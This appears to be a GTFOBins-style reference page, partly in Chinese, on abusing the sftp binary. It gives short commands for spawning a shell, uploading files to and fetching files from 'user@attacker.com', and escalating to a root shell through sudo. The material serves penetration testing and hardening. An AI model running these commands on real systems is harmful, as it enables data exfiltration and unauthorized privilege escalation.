.. / sftp

shell

用来生成一个交互式的系统shell。

• HOST=user@attacker.com
  sftp $HOST
  !/bin/sh
  

file-upload

上传文件到外部。

• Send local file to a SSH server.

  RHOST=user@attacker.com
  sftp $RHOST
  put 要发送的文件 file_to_save
  

file-download

下载远程文件。

• Fetch a remote file from a SSH server.

  RHOST=user@attacker.com
  sftp $RHOST
  get file_to_get file_to_save
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• HOST=user@attacker.com
  sudo sftp $HOST
  !/bin/sh